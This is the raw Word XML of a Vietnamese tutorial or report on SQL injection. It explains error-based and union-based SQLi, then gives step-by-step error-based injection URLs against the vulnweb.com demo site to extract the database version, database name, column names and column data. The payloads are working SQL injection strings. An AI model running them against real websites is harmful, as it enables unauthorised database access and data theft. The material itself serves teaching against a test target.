    <w:p w14:paraId="46ECD52F" w14:textId="06BB4265" w:rsidR="00C7733A" w:rsidRDefault="00C7733A" w:rsidP="00C7733A">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EED9C2" wp14:editId="2EADB4D7">
            <wp:extent cx="5731510" cy="3223974"/>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974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B4447E" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="00A47046">
      <w:r>
        <w:t>Ta thêm dấu nháy đơn ( ‘ ) vào cuối, ta có link :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD1EE65" w14:textId="0EF755E6" w:rsidR="00C7733A" w:rsidRDefault="00A05C5B" w:rsidP="00A47046">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00476356">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FCCE08"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/listproducts.php?cat=1′</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12FE8B70" w14:textId="4A37F7CB" w:rsidR="00C7733A" w:rsidRDefault="00C7733A" w:rsidP="00A47046">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6029F1BF" wp14:editId="398EA837">
            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="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974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2F778" w14:textId="502DEA09" w:rsidR="00A47046" w:rsidRDefault="00F653D3" w:rsidP="00A47046">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F653D3">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="00476356" w:rsidRPr="006374F2">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>website sẽ báo về lỗi Error-based SQLi!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7839C2" w14:textId="77777777" w:rsidR="006374F2" w:rsidRPr="006374F2" w:rsidRDefault="006374F2" w:rsidP="00A47046">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEF2674" w14:textId="779C34AB" w:rsidR="00476356" w:rsidRPr="00227E09" w:rsidRDefault="00F653D3" w:rsidP="00227E09">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc42895596"/>
      <w:r w:rsidRPr="00227E09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00476356" w:rsidRPr="00227E09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Union-based SQLi:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5AA3343D" w14:textId="184CF74F" w:rsidR="00476356" w:rsidRDefault="00F653D3" w:rsidP="006374F2">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00A47046">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="002937FE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006374F2">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00476356">
        <w:t>Union-based SQLi là một kĩ thuật tấn công in-band SQL, sử dụng toán tử UNION trong SQL để kết hợp kết quả của hai hay nhiều lệnh SELECT thành một kết quả mà nó được trả về như một phần của phản hồi HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4217EAFE" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="006374F2">
      <w:r>
        <w:t>Từ khóa UNION cho phép ta thực hiện một hay nhiều truy vấn SELECT để bổ sung vào kết quả truy vấn ban đầu. Ví dụ:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EDC28" w14:textId="77777777" w:rsidR="00476356" w:rsidRPr="006374F2" w:rsidRDefault="00476356" w:rsidP="006374F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006374F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT a, b FROM table1 UNION SELECT c, d FROM table2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B70A1C1" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:t>Truy vấn SQL này sẽ trả về một kết quả gồm 2 cột, bao gồm  giá trị cột a, b trong “table1” và cột c và d của “table2”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDF13C6" w14:textId="405D9114" w:rsidR="00A47046" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:t>Để truy vấn UNION hoạt động, cần phải đáp ứng hai điều kiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26C4FB" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>    • Các truy vấn riêng lẻ cần cùng số lượng cột.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235F8BC8" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:t>    • Các dữ liệu trong mỗi cột phải tương thích giữa các truy vấn riêng lẻ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23822CC8" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:t>Để thực hiện cuộc tấn công UNION SQL, bạn cần đảm bảo rằng cuộc tấn công của bạn cần đáp ứng đủ hai yêu cầu này. Điều này thường liên quan đến việc tìm ra:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCC62D" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:t>    • Có bao nhiêu cột được trả về từ truy vấn ban đầu ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234B9E2A" w14:textId="77777777" w:rsidR="00476356" w:rsidRDefault="00476356" w:rsidP="009C3C15">
      <w:r>
        <w:t>    • Những cột nào được trả về từ truy vấn ban đầu mà thuộc loại dữ liệu phù hợp để giữ kết quả từ truy vấn được chèn ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58572357" w14:textId="065CE04B" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00104C5D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Toc42895597"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1.3</w:t>
      </w:r>
      <w:r w:rsidR="00104C5D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Các khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4863CEFF" w14:textId="6FAACBE4" w:rsidR="00E162B2" w:rsidRPr="00227E09" w:rsidRDefault="00E162B2" w:rsidP="00227E09">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00104C5D">
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc42895598"/>
      <w:r w:rsidRPr="00227E09">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.Error-based SQLi:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="3808ED38" w14:textId="216D8063" w:rsidR="00E162B2" w:rsidRDefault="00104C5D" w:rsidP="00C24729">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidR="00E162B2">
        <w:t>Ta có 1 vài query dùng trong truy vấn khai thác này:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49815C5A" w14:textId="24156AD8" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00C24729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>GROUP BY: là câu lệnh được dùng cùng với các hàm tổng hợp để nhóm các kết quả theo cùng hàng hay cột.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C0CED4" w14:textId="558BA8EA" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00C24729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>FLOOR(X): trả về giá trị số kiểu int lớn nhất nhưng không lớn hơn X.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB3E3C" w14:textId="6146C12B" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00C24729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>FLOOR(RAND(0)*2): trả về 2 số tự nhiên khác (0, 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451F4583" w14:textId="4F2C4F52" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="004A35F7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Ta có truy vấn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA8888" w14:textId="3D24C41C" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="004A35F7">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C24729">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>SELECT COUNT(*), CONCAT((SELECT @@version), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E14B05C" w14:textId="77777777" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00104C5D">
      <w:r>
        <w:t xml:space="preserve">Truy vấn này dùng câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0C3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GROUP BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để nhóm kết quả được đặt theo cột x ( tôi có chọn cột x với câu lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0C3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CONCAT</w:t>
      </w:r>
      <w:r>
        <w:t>((</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0C3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> @@version), </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0C3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x3a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0C3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FLOOR</w:t>
      </w:r>
      <w:r>
        <w:t>(RAND(0)*2))  ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABE82EE" w14:textId="146FF10B" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00104C5D">
      <w:r>
        <w:t>Ta đặt truy vấn này vào sau đường link  gốc (1), ta được đường link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B19F35" w14:textId="77777777" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00104C5D">
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFF00"/>
        </w:rPr>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),CONCAT((SELECT @@version),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E357750" w14:textId="4FAA356E" w:rsidR="00E162B2" w:rsidRDefault="00E162B2" w:rsidP="00104C5D">
      <w:r>
        <w:t>Ta được kết quả như hình:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD09D05" w14:textId="11249D6A" w:rsidR="004A35F7" w:rsidRDefault="004A35F7" w:rsidP="00104C5D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44B7A1C2" wp14:editId="562ADFD7">
            <wp:extent cx="5731510" cy="2938011"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="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38011"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="742F27B4" w14:textId="78C5CF2C" w:rsidR="00E162B2" w:rsidRDefault="004A35F7" w:rsidP="00104C5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="00E162B2">
        <w:t xml:space="preserve"> ta lấy được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Database Version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A9CEB5" w14:textId="4E5C57A1" w:rsidR="001942E3" w:rsidRDefault="001942E3" w:rsidP="00104C5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479A9268" w14:textId="77777777" w:rsidR="00CE64AB" w:rsidRDefault="00CE64AB" w:rsidP="00104C5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CEAB62A" w14:textId="77777777" w:rsidR="001942E3" w:rsidRDefault="001942E3" w:rsidP="00104C5D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C61133D" w14:textId="78A89249" w:rsidR="00D54D5D" w:rsidRPr="00CE64AB" w:rsidRDefault="00D54D5D" w:rsidP="00CE64AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00227E09">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">               </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE64AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2: Getting database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632BF375" w14:textId="4DF2DAEF" w:rsidR="00D54D5D" w:rsidRDefault="001942E3" w:rsidP="001942E3">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D54D5D">
        <w:t>Ta dán vào đường link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2827C9B7" w14:textId="77777777" w:rsidR="00D54D5D" w:rsidRPr="0048480B" w:rsidRDefault="00D54D5D" w:rsidP="00FE417B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B48368A" w14:textId="19722EC6" w:rsidR="00D54D5D" w:rsidRPr="004A35F7" w:rsidRDefault="00D54D5D" w:rsidP="00FE417B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y);--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5FEDC" w14:textId="13A52C94" w:rsidR="001942E3" w:rsidRDefault="001942E3" w:rsidP="00FE417B">
      <w:pPr>
        <w:spacing w:line="600" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Ta thu được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCB62D7" w14:textId="77777777" w:rsidR="000E3036" w:rsidRPr="00FE417B" w:rsidRDefault="00721411" w:rsidP="00FE417B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="600" w:lineRule="auto"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08F1F4B3" wp14:editId="23E511A6">
            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="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974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00FE417B">
        <w:t xml:space="preserve">Ta để ý </w:t>
      </w:r>
      <w:r w:rsidR="000E3036" w:rsidRPr="00FE417B">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE417B">
        <w:t>hấy có database: “acuart”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5E9DC" w14:textId="4B1284D1" w:rsidR="000E3036" w:rsidRPr="00CE64AB" w:rsidRDefault="00FE417B" w:rsidP="00CE64AB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="009C3058">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E3036" w:rsidRPr="00CE64AB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 3: Lấy các bảng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77199FAB" w14:textId="77777777" w:rsidR="000E3036" w:rsidRDefault="000E3036" w:rsidP="00FE417B">
      <w:r>
        <w:t>Ta gán vào đường link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0F61FA" w14:textId="77777777" w:rsidR="000E3036" w:rsidRPr="0048480B" w:rsidRDefault="000E3036" w:rsidP="00FE417B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http://testphp.vulnweb.com/listproducts.php?cat=-1 AND (SELECT 1 FROM (SELECT count(*),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422E7B3A" w14:textId="77777777" w:rsidR="000E3036" w:rsidRPr="0048480B" w:rsidRDefault="000E3036" w:rsidP="00FE417B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">CONCAT((SELECT column_name from information_schema.columns where table_name='artists' limit 1,1),0x3a,FLOOR(RAND(0)*2)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3A3DE2" w14:textId="77777777" w:rsidR="000E3036" w:rsidRDefault="000E3036" w:rsidP="00FE417B">
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>x FROM information_schema.tables GROUP BY x) y);--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164CA77" w14:textId="77777777" w:rsidR="000E3036" w:rsidRDefault="000E3036" w:rsidP="00FE417B">
      <w:r>
        <w:t>Ta thu được kết quả:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5722CDAD" w14:textId="77777777" w:rsidR="00D57663" w:rsidRDefault="00D57663" w:rsidP="00D57663">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D7DC360" w14:textId="512A198B" w:rsidR="00D57663" w:rsidRDefault="00D57663" w:rsidP="005904CD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3EB82D7C" wp14:editId="483CC120">
            <wp:extent cx="5731510" cy="3223974"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="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974"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0995E" w14:textId="77777777" w:rsidR="00513079" w:rsidRDefault="00D57663" w:rsidP="00243FE4">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ta thu được cột “aname”</w:t>
      </w:r>
      <w:r w:rsidR="00243FE4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E801912" w14:textId="5E646C6E" w:rsidR="00D57663" w:rsidRPr="00243FE4" w:rsidRDefault="00243FE4" w:rsidP="00513079">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00513079">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Bước 4: Dump Column Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134ECEDD" w14:textId="77777777" w:rsidR="00D57663" w:rsidRDefault="00D57663" w:rsidP="00D57663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ta gán link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5162A98F" w14:textId="77777777" w:rsidR="00D57663" w:rsidRPr="0048480B" w:rsidRDefault="00D57663" w:rsidP="00D57663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">http://testphp.vulnweb.com/listproducts.php?cat=-1 AND </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FB268" w14:textId="77777777" w:rsidR="00D57663" w:rsidRPr="0048480B" w:rsidRDefault="00D57663" w:rsidP="00D57663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">(SELECT 1 FROM (SELECT count(*),CONCAT((SELECT aname from artists  limit 1,1),0x3a,FLOOR(RAND(0)*2)) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623C295A" w14:textId="77777777" w:rsidR="00D57663" w:rsidRDefault="00D57663" w:rsidP="00D57663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048480B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>x FROM information_schema.tables GROUP BY x) y);--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A4EDC" w14:textId="36798CED" w:rsidR="00D57663" w:rsidRDefault="005904CD" w:rsidP="005904CD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70202E3F" wp14:editId="0F25B332">
